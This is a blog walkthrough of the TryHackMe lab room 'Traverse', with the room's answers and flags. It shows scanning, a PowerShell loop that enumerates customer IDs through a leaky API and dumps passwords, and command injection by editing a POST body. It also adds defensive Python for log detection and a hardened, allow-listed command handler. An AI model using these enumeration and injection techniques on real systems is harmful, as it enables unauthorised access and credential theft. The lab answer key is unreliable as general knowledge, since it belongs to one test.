Traverse TryHackMe Walkthrough

Rich
Mar 6, 2024


TL;DR walkthrough of the TryHackMe room Traverse.

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

I’m still going over SDLC material on TryHackMe and studying up for a college class. I’m mediocre at best at webapps, so I figured I’d post my notes on how I got through this room in case they come in handy again.

I will lead with the questions and answers and then show how I made my way through the room.

Q & A

What type of encoding is used by the hackers to obfuscate the JavaScript file?

hex

What is the flag value after deobfuscating the file?

Directory listing is the only way

Logging is an important aspect. What is the name of the file containing email dumps?

email_dump.txt

The logs folder contains email logs and has a message for the software team lead. What is the name of the directory that Bob has created?

planning

What is the key file for opening the directory that Bob has created for Mark?

THM{100100111}

What is the email address for ID 5 using the leaked API endpoint?

john@traverse.com

What is the ID for the user with admin privileges?

3

What is the endpoint for logging in as the admin? Mention the last endpoint instead of the URL. For example, if the answer URL is tryhackme.com/admin, just write /admin.

/realadmin

The attacker uploaded a web shell and renamed a file used for managing the server. Can you find the name of the web shell that the attacker has uploaded?

thm_shell.php

What is the name of the file renamed by the attacker for managing the web server?

renamed_file_manager.php

Can you use the file manager to restore the original website by removing the “FINALLY HACKED” message? What is the flag value after restoring the main website?

THM{WEBSITE_RESTORED}

My methodology

As always, start with an nmap scan.

sudo nmap -sV -O 10.10.69.166

Let’s enumerate the webserver that’s running on port 80.

gobuster dir -u http://10.10.69.166 -w /usr/share/wordlists/dirb/common.txt

The logs directory turned out to be our initial way in.

I referenced the TryHackMe room I had done earlier while studying up on SDLC and made sure that I had the first phase of the Secure Software Development Lifecycle (SSDLC) right. It is indeed planning.

Hence we visit 10.10.69.166/planning, log in with the credentials admin \ THM{100100111}, and find the URL of an API that accepts GET requests.

Let’s use the ID value as a variable and send a series of GET requests, increasing the number by 1 as we go.

Set-Location ".\THM stuff\SDLC Stuff"
# GET http://MACHINE IP/api/?customer_id=1
# The machine IP below is from a different instance of the room than the rest of
# this write-up; substitute the IP of your own instance.

$x = 0   # first customer_id to try
$z = 7   # last customer_id to try
Do
{
    $Result = Invoke-WebRequest -Uri "http://10.10.65.38/api/?customer_id=$x" -Method Get
    # Keep only IDs that came back with a body. Note that Invoke-WebRequest throws on a
    # non-2xx status, so wrap the call in try/catch if the API answers missing IDs with 404.
    If (-not [string]::IsNullOrEmpty($Result.Content))
    {
        #Write-Host "User # $x exists."
        $Result.Content | Out-File .\TraverseUsers.txt -Append
        $Result.RawContent | Out-File .\TraverseUsers.txt -Append
    }
    $x = $x + 1
}
While ($x -le $z)

Skimming through the output in TraverseUsers.txt, ID #3 jumps out as having higher privileges.

{"data":{"id":"3","name":"admin","email":"realadmin@traverse.com","password":"admin_key!!!","timestamp":"2023-05-23 04:47:25","role":"admin","loginURL":"\/realadmin","isadmin":"1"},"response_code":200,"response_desc":"Success"}
{"data":{"id":"4","name":"Mark","email":"mark@traverse.com","password":"qwerty4","timestamp":"2023-05-23 04:47:25","role":"user","loginURL":"\/client","isadmin":"0"},"response_code":200,"response_desc":"Success"}
HTTP/1.1 200 OK
Content-Length: 212
Content-Type: application/json
Date: Mon, 04 Mar 2024 18:44:29 GMT
Server: Apache/2.4.41 (Ubuntu)
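The loop above leaves a very recognisable trail in the web server's access log (the room's server identifies itself as Apache/2.4.41): one client, consecutive customer_id values, seconds apart. As an added example that is not part of the original post, here is a small Python detector for that pattern; the log lines, client IPs and thresholds are all constructed.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed Apache combined-log sample (not from the room): one client walks
# /api/?customer_id=N in order, a second client makes one normal API call.
SAMPLE_LOG = """\
10.9.1.5 - - [04/Mar/2024:18:44:20 +0000] "GET /api/?customer_id=1 HTTP/1.1" 200 198 "-" "curl/8.0"
10.9.1.5 - - [04/Mar/2024:18:44:21 +0000] "GET /api/?customer_id=2 HTTP/1.1" 200 201 "-" "curl/8.0"
10.9.1.5 - - [04/Mar/2024:18:44:22 +0000] "GET /api/?customer_id=3 HTTP/1.1" 200 212 "-" "curl/8.0"
10.9.1.5 - - [04/Mar/2024:18:44:23 +0000] "GET /api/?customer_id=4 HTTP/1.1" 200 205 "-" "curl/8.0"
10.9.1.5 - - [04/Mar/2024:18:44:24 +0000] "GET /api/?customer_id=5 HTTP/1.1" 200 203 "-" "curl/8.0"
10.9.2.8 - - [04/Mar/2024:18:45:01 +0000] "GET /api/?customer_id=4 HTTP/1.1" 200 205 "-" "Mozilla/5.0"
10.9.2.8 - - [04/Mar/2024:18:46:10 +0000] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
"""

# Client IP, timestamp and request path from the combined log format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')
ID_RE = re.compile(r"^/api/\?customer_id=(\d+)$")


def find_id_enumeration(log_text, window=60, min_distinct=4):
    """Return {client_ip: sorted distinct customer_ids} for every client that
    requested at least `min_distinct` different IDs within `window` seconds."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        idm = ID_RE.match(m["path"]) if m else None
        if not idm:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits[m["ip"]].append((ts, int(idm.group(1))))

    flagged = {}
    for ip, events in hits.items():
        events.sort()
        in_window = Counter()  # distinct IDs inside the sliding time window
        lo = 0
        for ts, cid in events:
            in_window[cid] += 1
            # Drop events that have fallen out of the window.
            while (ts - events[lo][0]).total_seconds() > window:
                old = events[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            if len(in_window) >= min_distinct:
                flagged[ip] = sorted({c for _, c in events})
                break
    return flagged
```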

Swing by 10.10.69.166/realadmin and one will notice that it’s just a drop-down list with two options: show the present working directory, and show the user the webapp is running as. However, even someone as mediocre with webapps as myself knows that an attacker is not limited by the web form.

Hence we fire up Burp Suite and use the FoxyProxy add-on in Firefox to route our POST request to 10.10.69.166/realadmin through Burp first. The POST body contains “command=whoami”, so we simply change the command and voila, we have command injection.
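For contrast, here is what a non-injectable version of that handler looks like. This is an added Python sketch, not the room's PHP code: the two drop-down options map to fixed argv lists, anything else is rejected before a process is started, and the function names are my own.

```python
import subprocess

# Hypothetical hardened handler for a /realadmin-style form (added example, not
# the room's code): the request names an action, the server maps that name to a
# fixed argv list, and the request value itself never reaches a shell.
ALLOWED_ACTIONS = {
    "pwd": ["pwd"],        # the form's "present working directory" option
    "whoami": ["whoami"],  # the form's "user the webapp runs as" option
}

SHELL_META = set(";|&`$(){}<>\n")


def is_allowed(action):
    """Exact-match lookup: 'whoami; id' or 'whoami|id' are simply unknown keys."""
    return action in ALLOWED_ACTIONS


def resolve_action(action):
    """Map the submitted action name to its fixed argv list, or raise ValueError."""
    if not is_allowed(action):
        raise ValueError(f"unknown action: {action!r}")
    return list(ALLOWED_ACTIONS[action])


def looks_like_injection(action):
    """Logging/detection signal: a rejected action carrying shell metacharacters
    is worth an alert, a plain typo is not."""
    return any(ch in SHELL_META for ch in action)


def run_action(action, timeout=5):
    """Execute an allow-listed action with shell=False and return its stdout."""
    argv = resolve_action(action)  # raises ValueError before anything runs
    completed = subprocess.run(argv, capture_output=True, text=True,
                               timeout=timeout, shell=False)
    return completed.stdout.strip()
```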

We now know that there is another page at 10.10.69.166/renamed_file_manager.php, and the login is admin \ THM{10101}. Nice.

It turns out that this lists all the web pages, JavaScript, PHP, etc. that make up the website itself. We can now view and edit all content.

Hence we simply edit index.php and remove the “finally hacked” message left behind by the attacker.

THM’s questions wanted us to find an obfuscated file and figure out the message in it. This led me to look for a *.js file, and the first one I opened was hex-encoded.
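Decoding that file through an online converter works, but a few lines of Python handle both common hex forms in obfuscated JavaScript (\xNN escapes inside string literals and bare hex strings fed to a decoder function). Added example, not from the room: the JavaScript sample is constructed and fromHex is a made-up helper name.

```python
import re

# Constructed hex-obfuscated JavaScript (added sample, not the room's file):
# one string literal written as \xNN escapes, one passed as a bare hex string.
SAMPLE_JS = (
    'var title = "\\x44\\x69\\x72\\x65\\x63\\x74\\x6f\\x72\\x79";\n'
    'var hint = fromHex("6c697374696e67");\n'
    'var id = 0x1f;\n'
)

# Two or more consecutive \xNN escapes.
HEX_ESCAPE_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){2,}")
# A bare run of at least 6 hex byte pairs, not glued to other hex digits or an 0x prefix.
BARE_HEX_RE = re.compile(r"(?<![0-9a-fA-Fx])((?:[0-9a-fA-F]{2}){6,})(?![0-9a-fA-F])")


def decode_hex_escapes(text):
    """Replace runs of \\xNN escapes with the text they spell."""
    return HEX_ESCAPE_RE.sub(
        lambda m: bytes.fromhex(m.group(0).replace("\\x", "")).decode("utf-8", "replace"),
        text)


def decode_bare_hex(text):
    """Replace long bare hex strings that decode to printable text; leave the
    rest (binary data, genuine hashes) untouched."""
    def repl(m):
        try:
            decoded = bytes.fromhex(m.group(1)).decode("utf-8")
        except UnicodeDecodeError:
            return m.group(0)
        return decoded if decoded.isprintable() else m.group(0)
    return BARE_HEX_RE.sub(repl, text)


def deobfuscate(text):
    """Apply both decoders; the result is still JavaScript, just readable."""
    return decode_bare_hex(decode_hex_escapes(text))
```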

Summary

This was a good little room overall and actually fun, even for someone who sucks at webapps as badly as I do. The SDLC studying continues in the new DevSecOps Pathway.

References

TryHackMe SSDLC room: https://tryhackme.com/room/securesdlc

Hex to text converter: http://www.unit-conversion.info/texttools/hexadecimal/
